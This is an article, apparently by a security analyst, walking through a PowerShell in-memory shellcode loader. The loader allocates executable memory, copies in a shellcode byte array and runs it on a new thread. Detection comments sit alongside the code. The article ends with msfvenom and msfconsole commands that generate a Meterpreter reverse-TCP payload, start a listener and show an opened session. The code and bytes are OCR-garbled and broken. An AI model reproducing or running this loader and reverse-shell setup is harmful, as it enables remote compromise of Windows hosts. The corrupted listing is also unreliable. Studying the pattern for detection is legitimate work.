Simple In-Memory Injection

# Defender's walkthrough of a classic PowerShell in-memory shellcode loader.
# This listing is an OCR transcription and is reproduced byte-for-byte, transcription
# artefacts included; nothing below has been corrected. The comments describe what
# each step does so the pattern can be recognised in telemetry, not so it can be reused.
#
# Step 1: Win32 P/Invoke signatures, written as a C# source string that is compiled
# at runtime in the next step. The three imports (VirtualAlloc, CreateThread, memset)
# are the minimal "allocate / copy / execute" trio.
$pos= '[DllImport("kernel32.d11")] 
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwpysize, uint flAllocationType, uint flProtect);[DllImport("kerne132.d11")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackpysize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

# Step 2: Add-Type compiles the string into an in-memory .NET type; -passthru returns
# the type object so its static methods can be invoked as $malFunc::Name(...).
# Detection: a script block that hands Add-Type a member definition containing
# VirtualAlloc/CreateThread is a strong indicator in PowerShell Script Block Logging
# (event 4104) and is also visible to AMSI, since the C# source is compiled on the host.
$malFunc = Add-Type -memberDefinition $pos -Name 11Win32" -namespace Win32Functions -p assthru;
[Byte []];
# Step 3: the raw payload as a byte array (produced by msfvenom, see the transcript
# that follows the listing). The hex literals carry transcription errors and are
# left exactly as they appear.
[Byte[]] $pyld = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0xl4,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x.26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xcl,0xcf,0xd,0xl,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0xl0,0x8b,0x4a,0x3c,0x8b,0x4c,0xll,0x78,0xe3,0x48,0xl,0xdl,0x51,0x8b,0x59,0x20,0xl,0xd3,0x8b,0x49,0xl8, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0xl, 0xd6, 0x31, 0xff, 0.xac, 0xcl,0xcf,0xd,0xl,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0xl,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0xlc,0xl,0xd3,0x8b,0x4,0x8b,0xl,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0xl2,0xeb,0x8d,0x5d,0x68,0x33 ,0x32 ,0x0 ,0x.0, 0x68, 0.x77, 0x73, 0x32 ,0x5f 0x7,0xff,0xd5,x90,0xl,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xac,0x10,0x74,0x8b,0x68,0x2,0x0,0xll,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0xl0,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x61,0x0,0x0,0x0,0x6a,0x06,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x0x24,0xe9,0x71,0xff,0xff,0xff,0xl,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
# Step 4: allocation size is one page (0x1000) or the payload length, whichever is larger.
$pysize= 0x1000;
if ($pyld.Length -gt 0x1000) {$pysize = $pyld.Length};
# Step 5: VirtualAlloc(NULL, size, 0x3000, 0x40). 0x3000 is MEM_COMMIT|MEM_RESERVE and
# 0x40 is PAGE_EXECUTE_READWRITE, so the region is writable and executable at once.
# An RWX private allocation from a script host is the most widely alerted-on step of
# this pattern (EDR memory-scan and API-hook rules key on exactly this flag pair).
$z = $malFunc::VirtualAlloc(0,$pysize,0x3000,0x40);
# Step 6: copy the payload into the region one byte at a time through memset.
# This loop is a single statement that the transcription split across two lines.
for ($i=0;$i -le ($pyld.Length-1);$i++) {$malFunc::memset([IntPtr]($z.Tolnt32()+$i), $pyld
[$i], 1)} ;
# Step 7: start a new thread whose entry point is the region's base address, then
# sleep forever so the host process (and with it the injected thread) stays alive.
# Detection: CreateThread with a start address inside an unbacked RWX region, followed
# by a PowerShell process that never exits, is a textbook behavioural indicator.
$malFunc::CreateThread(0,0,$z,0,0,0);for (;;) { Start-sleep 60 };
parrot@Userman:-$msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh -o payld.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 410 bytes
Final size of psh file: 3255 bytes
Saved as: payld.ps1
parrot@Userman:-$msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost; set lport 4444; set ExitOnSession false; exploit -j"
[*] Meterpreter session 1 opened ( -> 
meterpreter > whoami




Prakash Ashok, Security Analyst at WeSecureApp, CTF player, Blockchain developer and Security Researcher.
